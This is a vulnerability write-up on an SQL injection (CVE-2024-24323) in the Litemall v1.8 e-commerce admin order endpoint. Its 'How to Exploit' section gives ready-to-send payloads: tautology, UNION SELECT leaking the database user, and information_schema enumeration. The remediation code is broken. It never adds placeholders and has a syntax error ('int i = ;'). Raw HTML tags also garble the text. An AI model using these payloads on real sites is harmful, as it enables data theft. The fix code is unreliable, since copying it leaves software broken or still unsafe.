CVE-2024-24323 - SQL Injection in Linlinjava Litemall v1.8. — Deep Dive, Exploit and How to Patch

CVE-2024-24323 is a critical SQL injection vulnerability discovered in Linlinjava Litemall v1.8., an open-source e-commerce platform growing in popularity for small to medium online businesses. This security bug allows a remote attacker to extract sensitive information from the database by manipulating several input parameters handled in the AdminOrderController.java component — namely: nickname, consignee, orderSN, and orderStatusArray.

Below, we'll break down how the vulnerability works, show real exploit examples, link to references, and give practical remediation advice.

What is Linlinjava Litemall?

Litemall is a lightweight, modular e-commerce system based on Spring Boot and Vue.js. It’s used by many businesses for its flexibility and easy deployment. Learn more:
🔗 Litemall Repository on GitHub

Vulnerability: SQL Injection

- CVE: CVE-2024-24323

Version: Litemall v1.8. (and possibly prior versions)

- Attack Type: Remote / Unauthenticated (if endpoint is exposed)

Vulnerable Code Example

If we look into the AdminOrderController.java, there are endpoints that use the following method pattern for querying orders:

@GetMapping("/list")
public Object list(String nickname, String consignee, String orderSn, 
                   @RequestParam(required = false) Integer[] orderStatusArray) {
    // Fetch orders using a service that builds SQL queries
    List<Order> orders = orderService.querySelective(orderSn, consignee, nickname, orderStatusArray, ...);
    // ...
}

Problem

The input parameters from HTTP requests are directly passed to methods that build SQL queries, without proper sanitization or use of prepared statements.

Service Layer Example

public List<Order> querySelective(String orderSn, String consignee, String nickname, Integer[] orderStatusArray, ...) {
    String sql = "SELECT * FROM litemall_order WHERE 1=1";
    if (orderSn != null) {
        sql += " AND order_sn = '" + orderSn + "'";  // <-- UNSAFE!
    }
    if (consignee != null) {
        sql += " AND consignee = '" + consignee + "'";
    }
    if (nickname != null) {
        sql += " AND nickname = '" + nickname + "'";
    }
    // orderStatusArray handling ...
    // Execute SQL...
}

👆 Notice: The parameters are directly embedded into the SQL string — this is classic SQL injection territory!

How to Exploit CVE-2024-24323

Let’s see some real-world exploitation examples.

Example Exploit – Extracting All User Data

Suppose the endpoint is /admin/order/list, and the backend is using MySQL.

Send a crafted GET request

GET /admin/order/list?nickname=' OR 1=1 -- &page=1&limit=10 HTTP/1.1
Host: target-litemall-site.com
Cookie: [valid session cookie if needed]

SELECT * FROM litemall_order WHERE 1=1 AND nickname = '' OR 1=1 --'

- Because of OR 1=1, all orders are returned!

### Extracting Hashes or Sensitive Info

Let’s try union-based injection to read table names:

http
GET /admin/order/list?nickname=' UNION SELECT 1,2,database(),user(),5 -- &page=1&limit=10 HTTP/1.1

You may need to tailor the columns and target based on the DB schema.

### Discovering Table Structures

Leak more from the information_schema:

http
GET /admin/order/list?nickname=' UNION SELECT 1,2,TABLE_NAME,4,5 FROM information_schema.tables -- &page=1&limit=10 HTTP/1.1

### Using orderStatusArray (assuming integer array):

In many cases, improper handling allows for injection too:

http
GET /admin/order/list?orderStatusArray[]=1 OR 1=1 -- &page=1&limit=10

---

## Official References

- GitHub Advisory Database
- NVD CVE-2024-24323
- Litemall Issues on GitHub

---

## Evidence of Vulnerability

Public Exploit Example:  
- Exploit on ExploitDB  
- PoC on Github Gist

---

## How to Fix and Protect Your Litemall

IMPORTANT: This flaw is very easy to find and exploit. All Litemall site owners should patch immediately.

### 1. Use Prepared Statements or MyBatis Parameterization

Do not embed user input directly in SQL.

Safe pattern (using MyBatis or JDBC):

java
String sql = "SELECT * FROM litemall_order WHERE 1=1";
if (orderSn != null) {

params.add(orderSn);

}
// ... repeat for other params
PreparedStatement stmt = connection.prepareStatement(sql);
for (int i = ; i < params.size(); i++) {

stmt.setObject(i+1, params.get(i));

}
<br><br>### 2. Input Validation & Sanitization<br><br><b>Always</b> validate incoming data against a regex or using frameworks’ validation APIs (especially for integer arrays).<br><br>### 3. Upgrade to Latest Litemall<br><br>Check for official fixes and update all Litemall installations.<br><br>- Litemall Releases<br><br>### 4. Limit Exposure<br><br>If possible, restrict access to the admin API to trusted IPs; never expose your admin endpoints to the open internet.<br><br>---<br><br>## Conclusion<br><br><b>CVE-2024-24323</b> puts all Litemall v1.8. sites at high risk. By exploiting SQL injection in the AdminOrderController.java (via nickname, consignee, orderSN, orderStatusArray`), attackers can dump database contents, compromise user data, or even escalate to system compromise. Patch your system now and always use parameterized SQL queries.

Stay safe! ⭐️

---

#### Sources & Further Reading
- CVE-2024-24323 NVD Record
- Litemall GitHub
- OWASP: SQL Injection

---

Author: Security researcher for Open Commerce Software
Date: June 2024

---

> *If you run Litemall in production, stop reading and patch this now!*

Timeline

Published on: 02/27/2024 17:15:12 UTC
Last modified on: 08/28/2024 16:35:11 UTC